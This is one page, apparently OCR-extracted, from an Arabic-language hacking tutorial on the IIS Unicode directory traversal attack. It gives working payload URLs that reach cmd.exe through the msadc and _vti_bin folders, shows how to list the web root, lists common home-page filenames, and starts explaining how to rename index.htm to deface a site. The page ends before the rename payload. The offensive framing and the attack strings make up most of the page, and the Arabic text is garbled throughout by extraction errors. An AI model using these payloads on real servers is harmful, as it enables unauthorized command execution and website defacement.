Page 140 - بسم الله الرحمن الرحيم
P. 140
نقو.م بعمل سكان على الموقع لنرى ما به من ثغرات وهنا مثال على ثغرات مبتدأه بالمجلد المطلوب )) اغلب
ثغرات اليونيكود تصنطلق من هذه المجلدات ((
(1مثال المجلد msadc
msadc/..%c0%af../..%c0%af../../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+C
(2مثال المجلد _vti_bin
vti_bin/..%c0%af../..%c0%af../.._/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+C
في سيرفرات IISعند تصركيبها )) بشكل عادي (( يكون المجلد الرئيسي للويب تصحت اسم معين وهو :
C:\Inetpub\wwwroot
او في المجلد
D:\Inetpub\wwwroot
او في المجلد
E:\Inetpub\wwwroot
في العاده يكون في الهارديسك Cولذلك سأكمل شرحي على انه هناك
ستجد في هذا المجلد عادة جهميع المواقع التي على السيرفر
فلو وجهدنا ثغرة يونيكود ما ولتكن
msadc/..%c0%af../..%c0%af../../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
وأردنا الولوج الى هذا الملف لنرى ما به فسنكتب الثغره هكذا :
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Inetpub\wwwroot
اذا كان السيرفر يحوي عدة مواقع فستجدها كل موقع باسمه ) ستجدها في مجلدات بداختل مجلد الـ
( wwwrootاما لو كان السيرفر عباره
عن موقع واحد فقط فستجد كافة الملفات في مجلد الـ wwwrootنفسه
في اغلب الظن يقو.م الهاكر بتغيير الصفحة الرئيسيه الولى وعليك ان تصعلم انه ليس دائما الصفحة الرئيسيه
الولى تصحمل اسم index.htm
هناك عدة تصسميات وأختتصارات لها وهذه بعضها )) معظمها ((
index.htm
index.asp
default.htm
default.asp
main.htm
main.asp
لنفرض الن اننا وجهدنا ان الصفحة الرئيسيه للموقع في مجلدنا wwwrootهي index.htmفكيف
سنقو.م بتغييرها وهو ما يهمنا تصقريبا من عملية
الختتراق هذه
سنقو.م اول بتغيير اسم الملف من index.htmالى اي اسم اختر يخطر ببالك وليكن ss.htm
طبعا سنرسل المر عبر ثغرة اليونيكود من المتصفح لديك وسنقو.م بتغيير الداله c+dirالى الداله c+ren
)) عليك ان تصعرف ان الوامر التي سوتصضع هي نفس الوامر الموجهوده في Dosوفي Command
Promptفعليك ان تصكون عارفا بما هو المر المراد استخدامه
المهم ستكتب الثغره هكذا :
140
